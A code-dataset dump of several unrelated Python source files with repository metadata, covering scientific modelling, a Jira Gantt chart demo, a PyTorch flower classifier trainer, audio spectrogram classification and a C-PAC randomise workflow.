50494232cb37bbd44d80e6b47816854f9df9e752 | 734 | py | Python | content/post/example.py | fboehm/blogdown-xmin | eda1ffb90645786f556fda89d748be4929ec3a1b | [
"MIT"
] | null | null | null | content/post/example.py | fboehm/blogdown-xmin | eda1ffb90645786f556fda89d748be4929ec3a1b | [
"MIT"
] | null | null | null | content/post/example.py | fboehm/blogdown-xmin | eda1ffb90645786f556fda89d748be4929ec3a1b | [
"MIT"
] | null | null | null | import numpy
from numpy.random import RandomState
from numpy.linalg import cholesky as chol
from limmbo.core.vdsimple import vd_reml
from limmbo.io.input import InputData
random = RandomState(15)
N = 100
S = 1000
P = 3
snps = (random.rand(N, S) < 0.2).astype(float)
kinship = numpy.dot(snps, snps.T) / float(10)
y = random.randn(N, P)
pheno = numpy.dot(chol(kinship), y)
pheno_ID = [ 'PID{}'.format(x+1) for x in range(P)]
samples = [ 'SID{}'.format(x+1) for x in range(N)]
datainput = InputData()
datainput.addPhenotypes(phenotypes = pheno,
phenotype_ID = pheno_ID, pheno_samples = samples)
datainput.addRelatedness(relatedness = kinship,
relatedness_samples = samples)
Cg, Cn, ptime = vd_reml(datainput, verbose=False)
Cg
Cn
ptime
| 29.36 | 51 | 0.739782 | import numpy
from numpy.random import RandomState
from numpy.linalg import cholesky as chol
from limmbo.core.vdsimple import vd_reml
from limmbo.io.input import InputData
random = RandomState(15)
N = 100
S = 1000
P = 3
snps = (random.rand(N, S) < 0.2).astype(float)
kinship = numpy.dot(snps, snps.T) / float(10)
y = random.randn(N, P)
pheno = numpy.dot(chol(kinship), y)
pheno_ID = [ 'PID{}'.format(x+1) for x in range(P)]
samples = [ 'SID{}'.format(x+1) for x in range(N)]
datainput = InputData()
datainput.addPhenotypes(phenotypes = pheno,
phenotype_ID = pheno_ID, pheno_samples = samples)
datainput.addRelatedness(relatedness = kinship,
relatedness_samples = samples)
Cg, Cn, ptime = vd_reml(datainput, verbose=False)
Cg
Cn
ptime
| 0 | 0 | 0 |
3f910aeb4d99e9e9031c69db1e7f38ffa5b6271f | 1,206 | py | Python | cpmpy/pigeon_hole.py | hakank/hakank | 313e5c0552569863047f6ce9ae48ea0f6ec0c32b | [
"MIT"
] | 279 | 2015-01-10T09:55:35.000Z | 2022-03-28T02:34:03.000Z | cpmpy/pigeon_hole.py | hakank/hakank | 313e5c0552569863047f6ce9ae48ea0f6ec0c32b | [
"MIT"
] | 10 | 2017-10-05T15:48:50.000Z | 2021-09-20T12:06:52.000Z | cpmpy/pigeon_hole.py | hakank/hakank | 313e5c0552569863047f6ce9ae48ea0f6ec0c32b | [
"MIT"
] | 83 | 2015-01-20T03:44:00.000Z | 2022-03-13T23:53:06.000Z | """
Pigeon hole problem in cpmpy.
ftp://ftp.inria.fr/INRIA/Projects/contraintes/publications/CLP-FD/plilp94.html
'''
pigeon: the pigeon-hole problem consists in putting n pigeons in m pigeon-holes (at most 1
pigeon per hole). The boolean formulation uses n × m variables to indicate, for each pigeon,
its hole number. Obviously, there is a solution iff n <= m.
'''
Model created by Hakan Kjellerstrand, hakank@hakank.com
See also my cpmpy page: http://www.hakank.org/cpmpy/
"""
import sys
import numpy as np
from cpmpy import *
from cpmpy.solvers import *
from cpmpy_hakank import *
# n: num pigeons
# m: n pigeon holes
n = 3
m = 10
pigeon_hole(n,m)
| 23.647059 | 92 | 0.678275 | """
Pigeon hole problem in cpmpy.
ftp://ftp.inria.fr/INRIA/Projects/contraintes/publications/CLP-FD/plilp94.html
'''
pigeon: the pigeon-hole problem consists in putting n pigeons in m pigeon-holes (at most 1
pigeon per hole). The boolean formulation uses n × m variables to indicate, for each pigeon,
its hole number. Obviously, there is a solution iff n <= m.
'''
Model created by Hakan Kjellerstrand, hakank@hakank.com
See also my cpmpy page: http://www.hakank.org/cpmpy/
"""
import sys
import numpy as np
from cpmpy import *
from cpmpy.solvers import *
from cpmpy_hakank import *
# n: num pigeons
# m: n pigeon holes
def pigeon_hole(n=3,m=10):
model = Model()
# variables
p = boolvar(shape=(n,m),name="p")
print("p:",p)
# max 1 pigeon per pigeon hole
for j in range(m):
model += (sum([p[(i,j)] for i in range(n)]) <= 1)
# all pigeon must be placed and only at one hole
for i in range(n):
model += (sum([p[(i,j)] for j in range(m)]) == 1)
ss = CPM_ortools(model)
num_solutions = 0
while ss.solve():
num_solutions += 1
print(p.value())
print()
get_different_solution(ss,p.flat)
print("num_solutions:", num_solutions)
n = 3
m = 10
pigeon_hole(n,m)
| 529 | 0 | 22 |
7821407816ab91cff3c7ab71fa39529fe74d0c47 | 178 | py | Python | openxc/sinks/__init__.py | hopper-maker/openxc-python | 2054c3d7a7ba09b8f0eeecc2348185857dc22f5f | [
"BSD-3-Clause"
] | 81 | 2015-01-17T04:21:55.000Z | 2022-01-12T16:54:26.000Z | openxc/sinks/__init__.py | hopper-maker/openxc-python | 2054c3d7a7ba09b8f0eeecc2348185857dc22f5f | [
"BSD-3-Clause"
] | 84 | 2015-01-14T20:17:44.000Z | 2020-10-19T21:46:25.000Z | openxc/sinks/__init__.py | hopper-maker/openxc-python | 2054c3d7a7ba09b8f0eeecc2348185857dc22f5f | [
"BSD-3-Clause"
] | 32 | 2015-03-08T14:03:53.000Z | 2022-01-04T12:21:59.000Z | from .base import DataSink
from .queued import QueuedSink
from .notifier import MeasurementNotifierSink
from .recorder import FileRecorderSink
from .uploader import UploaderSink
| 29.666667 | 45 | 0.859551 | from .base import DataSink
from .queued import QueuedSink
from .notifier import MeasurementNotifierSink
from .recorder import FileRecorderSink
from .uploader import UploaderSink
| 0 | 0 | 0 |
2c3beeaf32055f3520f70b13ccb503bb41f01910 | 3,071 | py | Python | jira_gantt_demo.py | bobk/jiracharts | 2b7c700eea5a99e8450408e8835b54e110892fd6 | [
"MIT"
] | null | null | null | jira_gantt_demo.py | bobk/jiracharts | 2b7c700eea5a99e8450408e8835b54e110892fd6 | [
"MIT"
] | null | null | null | jira_gantt_demo.py | bobk/jiracharts | 2b7c700eea5a99e8450408e8835b54e110892fd6 | [
"MIT"
] | null | null | null |
# http://github.com/bobk/jiracharts
#
# This example code set uses various charting libraries, Python with jira-python and
# PowerShell with JiraPS to demonstrate generating useful charts and visualizations from Jira data
from jira import JIRA
import os
import datetime
# in this program we use both the gantt and plotly libraries as examples
# all variables for gantt are prefixed with gantt, variables for plotly are prefixed with plotly
import gantt
import plotly.figure_factory as plotlyff
if __name__== "__main__" :
main()
| 48.746032 | 158 | 0.722566 |
# http://github.com/bobk/jiracharts
#
# This example code set uses various charting libraries, Python with jira-python and
# PowerShell with JiraPS to demonstrate generating useful charts and visualizations from Jira data
from jira import JIRA
import os
import datetime
# in this program we use both the gantt and plotly libraries as examples
# all variables for gantt are prefixed with gantt, variables for plotly are prefixed with plotly
import gantt
import plotly.figure_factory as plotlyff
def main():
# get our Jira connection information from env vars
server = os.environ['JIRA_SERVER'] # e.g. http://myjiraservername:8080
project = os.environ['JIRA_PROJECT'] # e.g. MYPROJECTNAME
username = os.environ['JIRA_USERNAME'] # your Jira username (username if Jira server, email if Jira Cloud)
password = os.environ['JIRA_PASSWORD'] # your password - note that for Jira Cloud you will need to use an API token
# this program is not a demonstration of error-checking, it is a demonstration of charting
# connect to the server
options = { "server" : server }
jira = JIRA(options, basic_auth=(username, password))
# search for issues - REPLACE this with your query, the code assumes your query returns only Epics
issues = jira.search_issues("(project=" + project + ") and (issuetype=Epic) order by created DESC", startAt=0)
charttitle = "demo of Gantt chart of Jira epics"
today = datetime.datetime.today()
ganttchart = gantt.Project(charttitle)
plotlylist = []
for issue in issues:
# REPLACE customfield_xxxxx below with your Jira instance's custom field identifier for Epic Name - get that value from the XML Export issue view on an Epic
epicname = issue.fields.customfield_10102
# construct the text for each Gantt bar and get the start/stop dates
# created and duedate are generally present on every Jira instance - change these fields if you need to
# e.g. you might also calculate the start date as the creation date of the earliest issue in the epic, and the end date as the end date of the latest issue
taskname = epicname + " (" + issue.key + ") " + issue.fields.status.name
startdate = datetime.datetime.strptime(issue.fields.created[0:10], '%Y-%m-%d')
stopdate = datetime.datetime.strptime(issue.fields.duedate, '%Y-%m-%d')
# add the task to the gantt chart
gantttask = gantt.Task(name=taskname, start=startdate, stop=stopdate)
ganttchart.add_task(gantttask)
# add the task to the plotly chart
plotlydictentry = dict(Task=taskname, Start=startdate, Finish=stopdate)
plotlylist.append(plotlydictentry)
# write the gantt chart to a file
ganttchart.make_svg_for_tasks(filename="ganttchart.svg", today=today, scale=gantt.DRAW_WITH_WEEKLY_SCALE)
# the plotly chart will pop up in the browser
plotlyfig = plotlyff.create_gantt(plotlylist, title=charttitle, showgrid_x=True, show_hover_fill=True)
plotlyfig.show()
if __name__== "__main__" :
main()
| 2,495 | 0 | 23 |
acb9334d64f5ab1ebdf08b5ba2bae76001fb9de8 | 7,698 | py | Python | train.py | hopems7/Image-Classifier | 20d5e56269909b9240da62fba3b949a64513c3bf | [
"MIT"
] | null | null | null | train.py | hopems7/Image-Classifier | 20d5e56269909b9240da62fba3b949a64513c3bf | [
"MIT"
] | null | null | null | train.py | hopems7/Image-Classifier | 20d5e56269909b9240da62fba3b949a64513c3bf | [
"MIT"
] | null | null | null | # imports here
import argparse
import time
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
import torchvision
from torchvision import datasets, models, transforms
import matplotlib.pyplot as plt
from collections import OrderedDict
# torchvision.datasets import ImageFolder
from torch.autograd import Variable
import numpy as np
from PIL import Image
print("Stop 1 - after imports")
if __name__ == "__main__":
main()
| 40.515789 | 147 | 0.573915 | # imports here
import argparse
import time
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
import torchvision
from torchvision import datasets, models, transforms
import matplotlib.pyplot as plt
from collections import OrderedDict
# torchvision.datasets import ImageFolder
from torch.autograd import Variable
import numpy as np
from PIL import Image
print("Stop 1 - after imports")
def parse_args():
print("Parsing..")
parser=argparse.ArgumentParser()
parser.add_argument('--data_dir', metavar='data_dir', type=str)
parser.add_argument('--arch', dest='arch', default='densenet121', choices=['densenet121', 'vgg16'])
parser.add_argument('--save_dir', dest='save_dir', action='store', default="checkpoint.pth")
parser.add_argument('--hidden_units', action='store', dest='hidden_units', default='512')
parser.add_argument('--learning_rate', action='store', dest='learning_rate', default='0.001')
parser.add_argument('--epochs', dest='epochs', default='3')
#if it fails maybe change the name for arch based on checkpoint save or add comment back
return parser.parse_args()
def train_mode(model, criterion, optimizer, trainloader, epochs, validloader):
print("About to train")
print_every = 10
steps = 0
#set the device
device=torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model.to(device)
start=time.time()
print("Start training: ")
for e in range(epochs):
running_loss = 0
for inputs, labels in trainloader:
steps += 1
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
# Forward and backward passes
outputs = model.forward(inputs)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if steps % print_every == 0:
model.eval()
validation_loss = 0
accuracy=0
for inputs2, labels2 in validloader:
optimizer.zero_grad()
inputs2, labels2 = inputs2.to(device), labels2.to(device)
with torch.no_grad():
outputs = model.forward(inputs2)
validation_loss = criterion(outputs,labels2)
ps = torch.exp(outputs)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels2.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
validation_loss = validation_loss / len(validloader)
accuracy = accuracy /len(validloader)
print("Epoch: {}/{}... ".format(e+1, epochs),
"Training Loss: {:.4f}".format(running_loss/print_every),
"Validation Loss {:.4f}".format(validation_loss),
"Accuracy: {:.4f}".format(accuracy),
)
running_loss = 0
model.train()
time_elapsed=time.time() - start
print("\nTime spent training: {:.0f}m {:.0f}s".format(time_elapsed//60, time_elapsed % 60))
return model
def save_checkpoint(model, optimizer, path, output_size, train_datasets, classifier, args):
print("Saving model...")
model.class_to_idx = train_datasets.class_to_idx
#hidden units and input size pot issues - added args
checkpoint={'pretrained_model': args.arch,
# 'input_size': input_size,
'output_size': output_size,
'state_dict': model.state_dict(),
'classifier': model.classifier,
'class_to_idx': model.class_to_idx,
'optimizer': optimizer.state_dict(),
'epochs': args.epochs,
'hidden_units': args.hidden_units,
'learning_rate': args.learning_rate
}
torch.save(checkpoint, 'checkpoint.pth')
print("Model Saved.")
def main():
print("in Main Module...")
args = parse_args()
data_dir='flowers'
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
test_valid_transforms = transforms.Compose([transforms.Resize(224),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
train_transforms=transforms.Compose([transforms.RandomRotation(30),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
# Load the datasets with ImageFolder
train_datasets= datasets.ImageFolder(train_dir, transform=train_transforms)
test_datasets = datasets.ImageFolder(test_dir, transform=test_valid_transforms)
valid_datasets = datasets.ImageFolder(valid_dir, transform=test_valid_transforms)
# Using the image datasets and the trainforms, define the dataloaders
trainloaders = torch.utils.data.DataLoader(train_datasets, batch_size=64, shuffle=True)
testloaders= torch.utils.data.DataLoader(test_datasets, batch_size=64, shuffle= True)
validloaders=torch.utils.data.DataLoader(valid_datasets, batch_size=64, shuffle=True)
#load the model
model=getattr(models, args.arch)(pretrained=True)
if args.arch == 'vgg16':
model=models.vgg16(pretrained=True)
classifier=nn.Sequential(OrderedDict([
('fc1', nn.Linear(25088, 1024)),
('dropout', nn.Dropout(p=0.5)),
('relu1', nn.ReLU()),
('fc2', nn.Linear(1024, 102)),
('output', nn.LogSoftmax(dim=1))]))
elif args.arch == 'densenet121':
model=models.densenet121(pretrained=True)
#this portion distinct from statement blocks
classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(1024, 500)),
('dropout', nn.Dropout(p=0.6)),
('relu1', nn.ReLU()),
('fc2', nn.Linear(500, 102)),
('output', nn.LogSoftmax(dim=1))
]))
#turn off gradient
for param in model.parameters():
param.requires_grad=False
model.classifier = classifier
criterion = nn.NLLLoss()
optimizer = optim.Adam(model.classifier.parameters(), lr=float(args.learning_rate))
epochs=int(args.epochs)
class_idx=train_datasets.class_to_idx
output_size=102
train_mode(model, criterion, optimizer, trainloaders, epochs, validloaders)
model.class_to_idx=class_idx
path=args.save_dir
save_checkpoint(model, optimizer, path, output_size, train_datasets, classifier, args)
#prev from savecheck function(model, epochs, learning_rate, optimizer, input_size, file_path, output_size, train_datasets, hidden_units, arch):
if __name__ == "__main__":
main()
| 7,037 | 0 | 112 |
c6c28e50c265fd0709ef305063d99b46f340c8f8 | 24 | py | Python | tests/template_loader/__init__.py | dwatkinsweb/django-skin | 925db5313f564e2edca0ea2419b5d7b752a7a518 | [
"MIT"
] | 3 | 2015-10-07T17:59:01.000Z | 2017-11-16T11:19:13.000Z | tests/template_loader/__init__.py | dwatkinsweb/django-skin | 925db5313f564e2edca0ea2419b5d7b752a7a518 | [
"MIT"
] | null | null | null | tests/template_loader/__init__.py | dwatkinsweb/django-skin | 925db5313f564e2edca0ea2419b5d7b752a7a518 | [
"MIT"
] | 2 | 2017-11-15T01:25:56.000Z | 2022-01-06T23:39:32.000Z | __author__ = 'dwatkins'
| 12 | 23 | 0.75 | __author__ = 'dwatkins'
| 0 | 0 | 0 |
119566b17135a8fd6c0115e3229ed30435c39dcf | 363 | py | Python | src/servman/parcel.py | dggfi/Servman | 5415b2f952fd082a5b50d583c53eb6a21b83a296 | [
"MIT"
] | null | null | null | src/servman/parcel.py | dggfi/Servman | 5415b2f952fd082a5b50d583c53eb6a21b83a296 | [
"MIT"
] | null | null | null | src/servman/parcel.py | dggfi/Servman | 5415b2f952fd082a5b50d583c53eb6a21b83a296 | [
"MIT"
] | null | null | null | from typing import Literal, Any | 25.928571 | 79 | 0.592287 | from typing import Literal, Any
class Parcel:
def __init__(
self,
routing: Literal['servman'] or Literal['client'] or Literal['service'],
destination_id: str,
action: str,
data: Any
):
self.routing = routing
self.destination_id = destination_id
self.action = action
self.data = data | 291 | -8 | 49 |
65e6116d33d8cbb4753140aa1fc3c8d721b23a9d | 722 | py | Python | src/numerical_utils/linalg.py | lpereira95/numerical_utils | 204bdab709f6f134dee16cb7142ae43b394b451a | [
"MIT"
] | null | null | null | src/numerical_utils/linalg.py | lpereira95/numerical_utils | 204bdab709f6f134dee16cb7142ae43b394b451a | [
"MIT"
] | null | null | null | src/numerical_utils/linalg.py | lpereira95/numerical_utils | 204bdab709f6f134dee16cb7142ae43b394b451a | [
"MIT"
] | null | null | null | import numpy as np
| 21.235294 | 75 | 0.583102 | import numpy as np
def is_sym(A, rtol=1e-5, atol=1e-8):
return np.allclose(A, A.T, rtol=rtol, atol=atol)
def create_tridiagonal(diag, diag_lower, diag_upper=None):
if diag_upper is None:
diag_upper = diag_lower
return np.diag(diag) + np.diag(diag_lower, -1) + np.diag(diag_upper, 1)
def get_max_band(A):
m = []
for j in range(A.shape[1]):
col = A[:, j]
m.append(np.max(np.abs(np.where(col != 0)[0] - j)))
return np.max(m)
def get_banded_sym_lower(A):
n = A.shape[0]
max_band = get_max_band(A)
A_band = np.empty((max_band + 1, n))
for j in range(n):
m = min(max_band + 1, (n - j))
A_band[:m, j] = A[j:(j + m), j]
return A_band
| 607 | 0 | 92 |
935f585f49031bde5efdefcb99f3e456bda692cf | 958 | py | Python | src/pytheas/services/project_service.py | dcronkite/pytheas | 3cdd6a21bda488e762931cbf5975964d5e574abd | [
"MIT"
] | null | null | null | src/pytheas/services/project_service.py | dcronkite/pytheas | 3cdd6a21bda488e762931cbf5975964d5e574abd | [
"MIT"
] | null | null | null | src/pytheas/services/project_service.py | dcronkite/pytheas | 3cdd6a21bda488e762931cbf5975964d5e574abd | [
"MIT"
] | null | null | null | from pytheas.data.projects import Project
import urllib.parse
| 26.611111 | 84 | 0.726514 | from pytheas.data.projects import Project
import urllib.parse
def get_project_names():
return [p.project_name for p in Project.objects()]
def get_project_by_name(project_name):
return Project.objects(project_name=project_name).first()
def get_project_by_url_name(project_name_url):
return Project.objects(project_name=urllib.parse.unquote_plus(project_name_url))
def get_project_details(project_name):
project = get_project_by_name(project_name)
return {
'name': project.project_name,
'description': project.description,
'start_date': project.start_date,
'end_date': project.end_date,
'name_url': urllib.parse.quote_plus(project.project_name),
}
def get_subprojects(project_name):
project = get_project_by_name(project_name)
return [
{'name': subproject,
'name_url': urllib.parse.quote_plus(subproject)
} for subproject in project.subprojects
]
| 775 | 0 | 115 |
a3fd027279b548953d0f5866c9bf6713ac534efa | 6,088 | py | Python | dd_widgets/audio_classification.py | jolibrain/dd_widgets | 74fe45d9442e611a6e3d0fdb5fc68d926afbbd1d | [
"Apache-2.0"
] | 4 | 2019-02-22T08:06:47.000Z | 2021-11-08T09:14:47.000Z | dd_widgets/audio_classification.py | jolibrain/dd_widgets | 74fe45d9442e611a6e3d0fdb5fc68d926afbbd1d | [
"Apache-2.0"
] | 1 | 2021-01-26T04:50:27.000Z | 2021-01-26T04:50:27.000Z | dd_widgets/audio_classification.py | jolibrain/dd_widgets | 74fe45d9442e611a6e3d0fdb5fc68d926afbbd1d | [
"Apache-2.0"
] | 4 | 2019-08-21T13:45:41.000Z | 2021-07-17T21:35:40.000Z | import logging
from pathlib import Path
from tempfile import mkstemp
from typing import Iterator, List, Optional
import glob
import matplotlib.pyplot as plt
import numpy as np
from IPython.display import Audio, Image, display
import cv2
import librosa
from tqdm import tqdm
from .mixins import ImageTrainerMixin
from .widgets import GPUIndex, Solver, Engine
def make_slice(total: int, size: int, step: int) -> Iterator[slice]:
"""
Sliding window over the melody. step should be less than or equal to size.
"""
if step > size:
logging.warn("step > size, you probably miss some part of the melody")
if total < size:
yield slice(0, total)
return
for t in range(0, total - size, step):
yield slice(t, t + size)
if t + size < total:
yield slice(total - size, total)
| 32.731183 | 80 | 0.545171 | import logging
from pathlib import Path
from tempfile import mkstemp
from typing import Iterator, List, Optional
import glob
import matplotlib.pyplot as plt
import numpy as np
from IPython.display import Audio, Image, display
import cv2
import librosa
from tqdm import tqdm
from .mixins import ImageTrainerMixin
from .widgets import GPUIndex, Solver, Engine
def make_slice(total: int, size: int, step: int) -> Iterator[slice]:
"""
Sliding window over the melody. step should be less than or equal to size.
"""
if step > size:
logging.warn("step > size, you probably miss some part of the melody")
if total < size:
yield slice(0, total)
return
for t in range(0, total - size, step):
yield slice(t, t + size)
if t + size < total:
yield slice(total - size, total)
def build_dir(src_dir: Path, dst_dir: Path):
if not dst_dir.exists():
dst_dir.mkdir()
for directory in src_dir.glob("*"):
new_dir = dst_dir / directory.stem
if not new_dir.exists():
new_dir.mkdir()
# build the list first to get its size...
file_list = list(directory.glob("*"))
for file in tqdm(file_list, desc=directory.name):
f = file.relative_to(src_dir)
# do not open the file (long) if the image already exists!
if sum(1 for _ in new_dir.glob(f"{f.stem}_*.exr")) == 0:
#if sum(1 for _ in new_dir.glob("*/*.exr")) == 0:
# if not (new_dir / f"{f.stem}_00000_00257.exr").exists():
y, sr = librosa.load(file)
# 2^9 seems a good compromise, maybe pass it as a parameter in
# the future.
D = librosa.stft(y, 2 ** 9, center=True)
spec = librosa.amplitude_to_db(
librosa.magphase(D)[0], ref=np.max
)
for slc in make_slice(spec.shape[1], 257, 100):
pattern = f"{f.stem}_{slc.start:>05d}_{slc.stop:>05d}.exr"
cv2.imwrite((new_dir / pattern).as_posix(), spec[:, slc])
class AudioClassification(ImageTrainerMixin):
def __init__( # type: ignore
self,
sname: str,
*, # unnamed parameters are forbidden
mllib: str = "caffe",
engine: Engine = "CUDNN_SINGLE_HANDLE",
training_repo: Path = None,
testing_repo: List[Path] = None,
tmp_dir: Path = None,
description: str = "classification service",
model_repo: Path = None,
host: str = "localhost",
port: int = 1234,
path: str = "",
gpuid: GPUIndex = 0,
# -- specific
nclasses: int = -1,
img_width: Optional[int] = None,
img_height: Optional[int] = None,
base_lr: float = 1e-4,
lr_policy: str = "fixed",
stepvalue: List[int] = [],
warmup_lr: float = 1e-5,
warmup_iter: int = 0,
iterations: int = 10000,
snapshot_interval: int = 5000,
test_interval: int = 1000,
layers: List[str] = [],
template: Optional[str] = None,
activation: Optional[str] = "relu",
dropout: float = 0.0,
autoencoder: bool = False,
mirror: bool = False,
rotate: bool = False,
scale: float = 1.0,
tsplit: float = 0.0,
finetune: bool = False,
resume: bool = False,
bw: bool = False,
crop_size: int = -1,
batch_size: int = 32,
test_batch_size: int = 16,
iter_size: int = 1,
solver_type: Solver = "SGD",
sam : bool = False,
swa : bool = False,
lookahead : bool = False,
lookahead_steps : int = 6,
lookahead_alpha : float = 0.5,
rectified : bool = False,
decoupled_wd_periods : int = 4,
decoupled_wd_mult : float = 2.0,
lr_dropout : float = 1.0,
noise_prob: float = 0.0,
distort_prob: float = 0.0,
test_init: bool = False,
class_weights: List[float] = [],
weights: Path = None,
tboard: Optional[Path] = None,
ignore_label: int = -1,
multi_label: bool = False,
regression: bool = False,
rand_skip: int = 0,
unchanged_data: bool = False,
ctc: bool = False,
target_repository: str = "",
**kwargs
) -> None:
super().__init__(sname, locals())
def _train_service_body(self):
body = super()._train_service_body()
tmp_dir = Path(self.tmp_dir.value)
train_dir = Path(self.training_repo.value)
test_dir = Path(self.testing_repo.value)
if not tmp_dir.exists():
tmp_dir.mkdir(parents=True)
exr_files = glob.glob(train_dir.as_posix() + '/*/*.exr')
if len(exr_files) == 0:
build_dir(train_dir, tmp_dir / "train")
body['data'] = [(tmp_dir / "train").as_posix()]
else:
body['data'] = [train_dir.as_posix()]
if self.testing_repo.value != "":
exr_files = glob.glob(test_dir.as_posix() + '/*/*.exr')
if len(exr_files) == 0:
build_dir(test_dir, tmp_dir / "test")
body['data'] += (tmp_dir / "test").as_posix()
else:
body['data'] += test_dir.as_posix()
return body
def display_img(self, args):
self.output.clear_output()
with self.output:
for filepath in args["new"]:
display(Audio(filepath, autoplay=True))
y, sr = librosa.load(filepath)
D = librosa.stft(y, 2 ** 9, center=True)
spec = librosa.amplitude_to_db(
librosa.magphase(D)[0], ref=np.max
)
fig, ax = plt.subplots(1, 5, figsize=(16, 4))
for i, sl in zip(range(5), make_slice(spec.shape[1], 257, 100)):
ax[i].imshow(spec[:, sl])
_, fname = mkstemp(suffix=".png")
fig.savefig(fname)
display(Image(fname))
| 5,100 | 24 | 127 |
ed96689ed757d8216e0bf5bc388e12340fe4031c | 662 | py | Python | minifold/ipynb.py | nokia/minifold | 3687d32ab6119dc8293ae370c8c4ba9bbbb47deb | [
"BSD-3-Clause"
] | 15 | 2018-09-03T09:40:59.000Z | 2021-07-16T16:14:46.000Z | src/ipynb.py | Infinite-Blue-1042/minifold | cd0aa9207f9e1819ed2ecbb24373cdcfe27abd16 | [
"BSD-3-Clause"
] | null | null | null | src/ipynb.py | Infinite-Blue-1042/minifold | cd0aa9207f9e1819ed2ecbb24373cdcfe27abd16 | [
"BSD-3-Clause"
] | 8 | 2019-01-25T07:18:59.000Z | 2021-04-07T17:54:54.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of the minifold project.
# https://github.com/nokia/minifold
__author__ = "Marc-Olivier Buob"
__maintainer__ = "Marc-Olivier Buob"
__email__ = "marc-olivier.buob@nokia-bell-labs.com"
__copyright__ = "Copyright (C) 2018, Nokia"
__license__ = "BSD-3"
def in_ipynb() -> bool:
"""
Tests whether the code is running inside a Jupyter Notebook.
Returns:
True iff the code is running inside a Jupyter Notebook.
"""
try:
return str(type(get_ipython())) == "<class 'ipykernel.zmqshell.ZMQInteractiveShell'>"
except NameError:
return False
| 27.583333 | 93 | 0.663142 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of the minifold project.
# https://github.com/nokia/minifold
__author__ = "Marc-Olivier Buob"
__maintainer__ = "Marc-Olivier Buob"
__email__ = "marc-olivier.buob@nokia-bell-labs.com"
__copyright__ = "Copyright (C) 2018, Nokia"
__license__ = "BSD-3"
def in_ipynb() -> bool:
"""
Tests whether the code is running inside a Jupyter Notebook.
Returns:
True iff the code is running inside a Jupyter Notebook.
"""
try:
return str(type(get_ipython())) == "<class 'ipykernel.zmqshell.ZMQInteractiveShell'>"
except NameError:
return False
| 0 | 0 | 0 |
8a088f9f876fa4e17fcded812bc3abfedb04dd72 | 5,353 | py | Python | CPAC/randomise/randomise.py | tbweng/C-PAC | 12a1807865273891aa3a566429ac9fe76c12532c | [
"BSD-3-Clause"
] | null | null | null | CPAC/randomise/randomise.py | tbweng/C-PAC | 12a1807865273891aa3a566429ac9fe76c12532c | [
"BSD-3-Clause"
] | null | null | null | CPAC/randomise/randomise.py | tbweng/C-PAC | 12a1807865273891aa3a566429ac9fe76c12532c | [
"BSD-3-Clause"
] | null | null | null |
import nipype.pipeline.engine as pe
from CPAC.pipeline.cpac_group_runner import load_config_yml
| 38.510791 | 137 | 0.665608 |
import nipype.pipeline.engine as pe
from CPAC.pipeline.cpac_group_runner import load_config_yml
def select(input_list):
import nibabel as nb
for i in input_list:
img = nb.load(i)
hdr = img.header
if hdr['cal_min'] == 0 and hdr['cal_max'] == 0:
print ("Warning! {} is an empty image because of no positive "
"values in the unpermuted statistic image, and it could "
"not be processed with tfce.".format('i'))
if not hdr['cal_max'] == 0 and hdr['cal_min'] == 0:
selected_file = i
return i
def prep_randomise_workflow(c, merged_file, mask_file, f_test, mat_file,
con_file, grp_file, output_dir, working_dir,
log_dir, model_name, fts_file=None):
import nipype.interfaces.utility as util
import nipype.interfaces.fsl as fsl
import nipype.interfaces.io as nio
wf = pe.Workflow(name='randomise_workflow')
wf.base_dir = c.work_dir
randomise = pe.Node(interface=fsl.Randomise(),
name='fsl-randomise_{0}'.format(model_name))
randomise.inputs.base_name = model_name
randomise.inputs.in_file = merged_file
randomise.inputs.mask = mask_file
randomise.inputs.num_perm = c.randomise_permutation
randomise.inputs.demean = c.randomise_demean
randomise.inputs.c_thresh = c.randomise_thresh
randomise.inputs.tfce = c.randomise_tfce
randomise.inputs.design_mat = mat_file
randomise.inputs.tcon = con_file
if fts_file:
randomise.inputs.fcon = fts_file
select_tcorrp_files = pe.Node(util.Function(input_names=['input_list'],
output_names=['out_file'],
function=select),
name='select_t_corrp')
wf.connect(randomise, 't_corrected_p_files', select_tcorrp_files, 'input_list')
select_tstat_files = pe.Node(util.Function(input_names=['input_list'],
output_names=['out_file'],
function=select),
name='select_t_stat')
wf.connect(randomise, 'tstat_files', select_tstat_files, 'input_list')
thresh = pe.Node(interface=fsl.Threshold(),
name='fsl_threshold_contrast')
thresh.inputs.thresh = 0.95
thresh.inputs.out_file = 'randomise_pipe_thresh_tstat.nii.gz'
wf.connect(select_tstat_files, 'out_file', thresh, 'in_file')
thresh_bin = pe.Node(interface=fsl.UnaryMaths(),
name='fsl_threshold_bin_contrast')
thresh_bin.inputs.operation = 'bin'
wf.connect(thresh, 'out_file', thresh_bin, 'in_file')
apply_mask = pe.Node(interface=fsl.ApplyMask(),
name='fsl_applymask_contrast')
wf.connect(select_tstat_files, 'out_file', apply_mask, 'in_file')
wf.connect(thresh_bin, 'out_file', apply_mask, 'mask_file')
cluster = pe.Node(interface=fsl.Cluster(),
name='cluster_contrast')
cluster.inputs.threshold = 0.0001
cluster.inputs.out_index_file = "index_file"
cluster.inputs.out_localmax_txt_file = "lmax_contrast.txt"
cluster.inputs.out_size_file = "cluster_size_contrast"
cluster.inputs.out_threshold_file = True
cluster.inputs.out_max_file = True
cluster.inputs.out_mean_file = True
cluster.inputs.out_pval_file = True
cluster.inputs.out_size_file = True
wf.connect(apply_mask, 'out_file', cluster, 'in_file')
ds = pe.Node(nio.DataSink(), name='fsl-randomise_sink')
ds.inputs.base_directory = str(output_dir)
ds.inputs.container = ''
